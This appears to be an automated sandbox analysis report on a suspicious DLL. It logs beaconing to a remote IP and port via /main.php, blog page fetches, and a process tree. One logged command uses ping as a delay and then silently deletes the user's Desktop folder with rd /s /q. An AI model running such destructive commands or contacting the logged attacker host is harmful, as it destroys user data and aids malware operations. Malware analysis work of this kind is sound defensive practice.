                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    98192.168.2.750131107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:11.891078949 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    99192.168.2.750132107.163.56.236189637816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Dec 19, 2024 15:46:12.006628036 CET183OUTGET /main.php HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                    Host: 107.163.56.236:18963
                                                                                                                                    Cache-Control: no-cache


                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.749856116.133.8.924437816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-19 14:44:13 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-12-19 14:44:15 UTC653INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:14 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 12839
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Origin-Agent-Cluster: ?0
                                                                                                                                    P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Expires: Thu, 19 Dec 2024 14:44:14 GMT
                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 02:25:10 GMT+8
                                                                                                                                    DPOOL_HEADER: 10.13.3.118
                                                                                                                                    strict-transport-security: max-age=180
                                                                                                                                    Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                    Age: 73145
                                                                                                                                    X-Cache: HIT from fe1506ed4d61
                                                                                                                                    Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                    X-Via-SSL: ssl.56.sinag1.hj4.lb.sinanode.com
                                                                                                                                    2024-12-19 14:44:15 UTC7579INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 46 61 6b 65 2d 4a 61 70 61 6e 65 73 65 5f e6
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="//www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Fake-Japanese_
                                                                                                                                    2024-12-19 14:44:15 UTC5260INData Raw: 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 73 63 6f 72 65 22 3e 3c 73 74 72 6f 6e 67 3e 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 69 6e 66 6f 5f 6c 69 73 74 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 53 47 5f 74 78 74 63 22 3e e5 8d 9a e5 ae a2 e8 ae bf e9 97 ae ef bc 9a 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 70 76 22 3e 3c 73 74 72 6f 6e 67 3e 33 34 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: id="comp_901_score"><strong>0</strong></span></li> </ul> <ul class="info_list2"> <li><span class="SG_txtc"></span><span id="comp_901_pv"><strong>345</strong></span></li>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.749937116.133.8.924437816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-19 14:44:37 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-12-19 14:44:38 UTC653INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Thu, 19 Dec 2024 14:44:37 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 12839
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Origin-Agent-Cluster: ?0
                                                                                                                                    P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Expires: Thu, 19 Dec 2024 14:44:37 GMT
                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 02:25:10 GMT+8
                                                                                                                                    DPOOL_HEADER: 10.13.3.118
                                                                                                                                    strict-transport-security: max-age=180
                                                                                                                                    Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                    Age: 73168
                                                                                                                                    X-Cache: HIT from fe1506ed4d61
                                                                                                                                    Content-Security-Policy: upgrade-insecure-requests
                                                                                                                                    X-Via-SSL: ssl.27.sinag1.hj4.lb.sinanode.com
                                                                                                                                    2024-12-19 14:44:38 UTC7579INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 46 61 6b 65 2d 4a 61 70 61 6e 65 73 65 5f e6
                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "//www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="//www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Fake-Japanese_
                                                                                                                                    2024-12-19 14:44:38 UTC5260INData Raw: 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 73 63 6f 72 65 22 3e 3c 73 74 72 6f 6e 67 3e 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 69 6e 66 6f 5f 6c 69 73 74 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 53 47 5f 74 78 74 63 22 3e e5 8d 9a e5 ae a2 e8 ae bf e9 97 ae ef bc 9a 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 22 63 6f 6d 70 5f 39 30 31 5f 70 76 22 3e 3c 73 74 72 6f 6e 67 3e 33 34 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                    Data Ascii: id="comp_901_score"><strong>0</strong></span></li> </ul> <ul class="info_list2"> <li><span class="SG_txtc"></span><span id="comp_901_pv"><strong>345</strong></span></li>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.749989116.133.8.924437816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-19 14:44:54 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Connection: Keep-Alive


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.750001116.133.8.924437816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-19 14:44:57 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Connection: Keep-Alive


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.750041116.133.8.924437816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-19 14:45:10 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Connection: Keep-Alive


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.750055116.133.8.924437816C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-12-19 14:45:14 UTC142OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                    Host: blog.sina.com.cn
                                                                                                                                    Connection: Keep-Alive


                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:09:43:12
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll"
                                                                                                                                    Imagebase:0xe30000
                                                                                                                                    File size:126'464 bytes
                                                                                                                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:09:43:12
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:09:43:12
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1
                                                                                                                                    Imagebase:0x410000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:09:43:12
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,InputFile
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:09:43:12
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",#1
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:09:43:15
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,PrintFile
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:09:43:18
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 672
                                                                                                                                    Imagebase:0x360000
                                                                                                                                    File size:483'680 bytes
                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:09:43:18
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\4hSuRTwnWJ.dll,WriteErrorLog
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:09:43:21
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",InputFile
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:14
                                                                                                                                    Start time:09:43:21
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",PrintFile
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:15
                                                                                                                                    Start time:09:43:22
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:17
                                                                                                                                    Start time:09:43:22
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                    Imagebase:0x410000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:09:43:22
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:19
                                                                                                                                    Start time:09:43:22
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                    Imagebase:0xfc0000
                                                                                                                                    File size:18'944 bytes
                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:20
                                                                                                                                    Start time:09:43:24
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8000 -s 676
                                                                                                                                    Imagebase:0x360000
                                                                                                                                    File size:483'680 bytes
                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:11:15:25
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:25
                                                                                                                                    Start time:11:15:25
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                    Imagebase:0x410000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:26
                                                                                                                                    Start time:11:15:25
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:27
                                                                                                                                    Start time:11:15:25
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                    Imagebase:0xfc0000
                                                                                                                                    File size:18'944 bytes
                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:30
                                                                                                                                    Start time:11:15:33
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\4hSuRTwnWJ.dll",WriteErrorLog
                                                                                                                                    Imagebase:0x220000
                                                                                                                                    File size:61'440 bytes
                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:31
                                                                                                                                    Start time:11:15:33
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                    Imagebase:0x410000
                                                                                                                                    File size:236'544 bytes
                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:32
                                                                                                                                    Start time:11:15:33
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    General

                                                                                                                                    Target ID:33
                                                                                                                                    Start time:11:15:33
                                                                                                                                    Start date:19/12/2024
                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:ping 127.0.0.1 -n 3
                                                                                                                                    Imagebase:0xfc0000
                                                                                                                                    File size:18'944 bytes
                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Disassembly

                                                                                                                                    Reset < >

                                                                                                                                      Executed Functions

                                                                                                                                      Function 1000CCF8 Relevance: .0, Instructions: 2COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.1845765804.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
